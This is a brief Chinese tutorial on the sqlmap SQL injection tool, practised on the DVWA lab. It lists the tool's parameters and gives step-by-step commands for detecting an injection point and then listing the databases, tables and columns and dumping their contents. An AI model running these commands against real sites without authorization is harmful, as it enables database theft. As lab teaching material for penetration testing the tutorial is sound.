0x00 sqlmap简介:sqlmap是一款针对sql漏洞的自动化注入工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。 官方网站下载http://sqlmap.org/
sqlmap基于python环境下使用,可运行于win系统和linux系,主要是看大家的习惯使用即可。
sqlmap支持的数据库有:(MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB)
本文章以dvwa靶场做实验。
0x01 sqlmap 的参数介绍:
-u #注入点
–dbs #列出所有数据库
–tables #列出所有表名
–columns #列出字段
–dump-all #列出所有数据库所有表
-D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段
0x02 sqlmap的测试步骤:
sqlmap -u “url”
探测到了有注入漏洞,就可以往下一步进行了

暴库:
sqlmap -u “url” –dbs #通过探测知道是那个数据库,可以用–dbms 数据库,探测指定的数据库,这样速度会快一点

爆表:
sqlmap -u “url” -D “数据库” –tables

爆字段:
sqlmap -u “url” -D “数据库” -T “表名” –columns

爆内容:
sqlmap -u “url” -D “数据库” -T “表名” -C “字段” –dump
